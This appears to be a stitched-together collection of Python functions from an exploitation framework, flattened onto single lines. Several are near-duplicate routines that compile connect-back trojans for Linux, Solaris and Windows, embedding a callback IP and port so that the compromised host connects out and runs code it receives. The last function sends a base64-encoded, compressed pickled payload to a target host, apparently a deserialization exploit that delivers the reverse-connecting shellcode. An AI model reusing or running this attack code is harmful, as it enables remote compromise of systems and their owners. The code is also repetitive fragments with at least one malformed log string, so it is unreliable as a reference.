def create_native_python_mosdef(self): ip_bytes = ["%02x" % ord(byte) for byte in socket.inet_aton(self.callback.ip)] if len(ip_bytes) < 4: ip_bytes = "\x00"* (4-len(ip_bytes)) cback_addr = "0x"+"".join(ip_bytes) cback_port = self.callback.port mosdef_type = 22 cc_args = ["-c", "-k", "2.6", "-t", "24", "-D", "__AMD64__", "-D", "CBACK_ADDR=%s" % cback_addr, "-D", "CBACK_PORT=%d" % cback_port, "-D", "MOSDEF_TYPE=%d" % mosdef_type, "-v", "-m", "Linux", "-p", "X64", os.path.join(canvas_root_directory, "backdoors", "cback_mmap_rwx.c")] threadsafe_cc_main(cc_args) with open(os.path.join(canvas_root_directory, "cback_mmap_rwx.sc"), "rb") as handle: shellcode_data = handle.read() shellcode_data = ("A" if len(shellcode_data) % 2 != 0 else "") + shellcode_data payload = escape_chars(shellcode_data) python_x64_mosdef_loader = template_python_x64_mosdef_loader.replace("INSERT_MOSDEF_HERE", payload) return python_x64_mosdef_loader
def maketrojan(self): t_os = canvasos('Linux') t_os.arch = "X86" from MOSDEF import makeexe from MOSDEF.cc import threadsafe_cc_main self.log('[D2] Compiling Unix trojan') infilename = "backdoors/cback_mmap_rwx.c" vars = {} vars['CBACK_PORT'] = self.callback.port vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip)) self.log('[D2] Callback address is %s' % vars['CBACK_ADDR']) cc_command = [] for var in vars: cc_command += ["-D", "%s=%s" % (var, vars[var])] cc_command += [ "-d", "-v", "-m", "Linux", "-p", "i386", "-k", "None", infilename ] self.log('[D2] CC command: %s"%cc_command') mosdeftrojan = threadsafe_cc_main(cc_command) if not mosdeftrojan: self.log('[D2] Was unable to create trojan!') return '' self.log('[D2] Length of CC compiled trojan: %s' % len(mosdeftrojan)) self.log('[D2] Writing out %d bytes to %s' % (len(mosdeftrojan), self.trojanname)) file(self.trojanname, "wb").write(mosdeftrojan) ret = len(mosdeftrojan) != 0 return ret
def maketrojan_linux(self): from MOSDEF import makeexe from MOSDEF.cc import threadsafe_cc_main self.log("[!] Compiling Unix trojan") infilename = "backdoors/cback_mmap_rwx.c" vars = {} vars['CBACK_PORT'] = self.callback.port vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip)) self.log("[!] Callback address is %s" % vars['CBACK_ADDR']) cc_command = [] for var in vars: cc_command += ["-D", "%s=%s" % (var, vars[var])] cc_command += [ "-d", "-v", "-m", "Linux", "-p", "i386", "-k", "None", infilename ] self.log("[!] CC command: %s" % cc_command) self.mosdeftrojan = threadsafe_cc_main(cc_command) self.log("[!] Length of CC compiled trojan: %s" % len(self.mosdeftrojan)) self.log("[!] Writing out %d bytes to %s" % (len(self.mosdeftrojan), self.trojannamelinux)) file(self.trojannamelinux, "wb").write(self.mosdeftrojan) self.setInfo("%s - done" % (NAME)) ret = len(self.mosdeftrojan) != 0 return ret
def buildTrojan(self, type="Linux", arch="X86"): "build a MOSDEF based trojan binary" mosdeftrojan = "" if type in ["Linux", "Solaris"]: from MOSDEF import makeexe from MOSDEF.cc import threadsafe_cc_main self.log("[!] Compiling Unix trojan") infilename = "backdoors/cback_mmap_rwx.c" vars = {} vars['CBACK_PORT'] = self.callback.port vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip)) self.log("[!] Callback address is %s" % vars['CBACK_ADDR']) cc_command = [] for var in vars: cc_command += ["-D", "%s=%s" % (var, vars[var])] cc_command += ["-v", "-m", type, "-p", arch, infilename] self.log("[!] CC command: %s" % cc_command) mosdeftrojan = threadsafe_cc_main(cc_command) if not mosdeftrojan: self.log("[X] Was unable to create trojan!") return "" self.log("[!] Length of CC compiled trojan: %s" % len(mosdeftrojan)) elif type in ["Windows"]: from MOSDEF import pelib from shellcode import shellcodeGenerator sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0}) #don't mess with eip sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", { "port": self.callback.port, "ipaddress": self.callback.ip }) sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("ExitThread", None) shellcode = sc.get() myPElib = pelib.PElib() mosdeftrojan = myPElib.createPEFileBuf(shellcode) if mosdeftrojan == None: self.log("Some sort of error compiling our PE") return "" self.log("[!] Win32 MOSDEF Trojan compiled to %d bytes" % len(mosdeftrojan)) return mosdeftrojan
def maketrojan(self): t_os = canvasos(targets[self.version]) t_os.arch = "X86" if self.version == 0: self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os=t_os) self.log("Writing out %d bytes to %s" % (len(self.mosdeftrojan), self.trojanname)) self.htafile = self.file4hta(self.mosdeftrojan) file(self.trojanname, "wb").write(self.htafile) self.setInfo("%s - done" % (NAME)) ret = len(self.mosdeftrojan) != 0 else: from MOSDEF import makeexe from MOSDEF.cc import threadsafe_cc_main self.log("[!] Compiling Unix trojan") infilename = "backdoors/cback_mmap_rwx.c" vars = {} vars['CBACK_PORT'] = self.callback.port vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip)) self.log("[!] Callback address is %s" % vars['CBACK_ADDR']) cc_command = [] for var in vars: cc_command += ["-D", "%s=%s" % (var, vars[var])] cc_command += [ "-d", "-v", "-m", "Linux", "-p", "i386", "-k", "None", infilename ] self.log("[!] CC command: %s" % cc_command) mosdeftrojan = threadsafe_cc_main(cc_command) if not mosdeftrojan: self.log("[X] Was unable to create trojan!") return "" self.log("[!] Length of CC compiled trojan: %s" % len(mosdeftrojan)) self.log("[!] Writing out %d bytes to %s" % (len(mosdeftrojan), self.trojanname)) file(self.trojanname, "wb").write(mosdeftrojan) ret = len(mosdeftrojan) != 0 return ret
def run(self): global unsafe_template_python_x86_mosdef_loader global safe_template_python_x86_mosdef_loader global python_x86_mosdef_loader self.getargs() self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.host,self.port)) self.log("Attacking %s:%d"%(self.host,self.port)) ret=0 if False: t_os = canvasos("Linux") t_os.arch = "X64" self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os=t_os, http=self.mosdef_http, ssl=self.mosdef_ssl, universal=self.mosdef_universal, encrypted=self.mosdef_encrypted) payload = escape_chars(self.mosdeftrojan) python_x86_mosdef_loader = safe_template_python_x86_mosdef_loader.replace("INSERT_MOSDEF_HERE", payload) else: payload = None try: os.unlink(os.path.join(canvas_root_directory, "cback_mmap_rwx.sc")) except IOError as e: pass except OSError as e: pass ip_bytes = ["%02x" % ord(byte) for byte in socket.inet_aton(self.callback.ip)] if len(ip_bytes) < 4: ip_bytes = "\x00"* (4-len(ip_bytes)) cback_addr = "0x"+"".join(ip_bytes) cback_port = self.callback.port mosdef_type = 22 cc_args = ["-c", "-k", "2.6", "-t", "24", "-D", "__AMD64__", "-D", "CBACK_ADDR=%s" % cback_addr, "-D", "CBACK_PORT=%d" % cback_port, "-D", "MOSDEF_TYPE=%d" % mosdef_type, "-v", "-m", "Linux", "-p", "X64", os.path.join(canvas_root_directory, "backdoors", "cback_mmap_rwx.c")] threadsafe_cc_main(cc_args) with open(os.path.join(canvas_root_directory, "cback_mmap_rwx.sc"), "rb") as handle: shellcode_data = handle.read() shellcode_data = ("A" if len(shellcode_data) % 2 != 0 else "") + shellcode_data payload = escape_chars(shellcode_data) python_x86_mosdef_loader = unsafe_template_python_x86_mosdef_loader.replace("INSERT_MOSDEF_HERE", payload) pickled = cPickle.dumps(PayloadObject()) s=self.gettcpsock() s.connect((self.host, self.port)) self.websend(s, base64.b64encode(zlib.compress(pickled))+"\n") s.close() return 1